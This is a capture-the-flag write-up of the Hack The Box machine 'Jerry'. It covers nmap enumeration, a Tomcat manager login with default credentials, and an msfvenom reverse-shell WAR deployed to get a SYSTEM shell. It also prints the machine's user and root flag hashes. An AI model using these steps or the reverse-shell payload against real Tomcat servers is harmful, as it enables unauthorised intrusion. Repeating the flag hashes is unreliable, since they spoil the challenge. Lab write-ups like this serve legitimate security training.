Jerry

Windows box on HTB.

Enumeration:

Port Scanning:

Nmap:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Jerry]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 10.129.136.9            
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-18 12:46 +03
Nmap scan report for 10.129.136.9
Host is up, received echo-reply ttl 127 (0.14s latency).
Scanned at 2025-09-18 12:46:24 +03 for 139s
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE REASON          VERSION
8080/tcp open  http    syn-ack ttl 127 Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88

We only have apache tomcat running on port 8080.

Open it with Firefox:

We can see the version is shown above, and it is old, so we can find a multiple of exploits.

Exploitaion:

Get a reverse shell:

I will click on manager app:

It will ask me for username and password:

We can try multiple combinations of default credentials, like admin:admin:

We will get access denied, but it will show default credentials tomcat:s3cret:

Lets test them:

We successfully managed to authenticate.

We can now upload a jsp file or war file and deploy, but first we should create the war file using msfvenom:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Jerry]                                   
└─$ msfvenom -p java/shell_reverse_tcp LHOST=10.10.16.16 LPORT=443 -f war -o shell.war                                                                                      
Payload size: 13030 bytes                  
Final size of war file: 13030 bytes                                                   
Saved as: shell.war

Scroll down a bit, we will find (select war file to upload):

I will press browse, and upload the shell.war that I created:

Click on deploy, and we will see it in the applications table:

Start our netcat listener:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Jerry]                                   
└─$ rlwrap nc -nlvp 443                    
listening on [any] 443 ...

And click on that shell in the applications table, or naviagte to IP:PORT/shell/:

We will see a blank page, but when we go back to our listener:

connect to [10.10.16.16] from (UNKNOWN) [10.129.136.9] 49198                          
Microsoft Windows [Version 6.3.9600]       
(c) 2013 Microsoft Corporation. All rights reserved.                                  
                                           
C:\apache-tomcat-7.0.88>whoami
nt authority\system

C:\apache-tomcat-7.0.88>hostname
JERRY

C:\apache-tomcat-7.0.88>ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::19c5:d18d:c40a:d5cd
   Link-local IPv6 Address . . . . . : fe80::19c5:d18d:c40a:d5cd%12
   IPv4 Address. . . . . . . . . . . : 10.129.136.9
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%12
                                       10.129.0.1

Tunnel adapter isatap..htb:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : .htb

We can now get the flags:

C:\apache-tomcat-7.0.88>type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e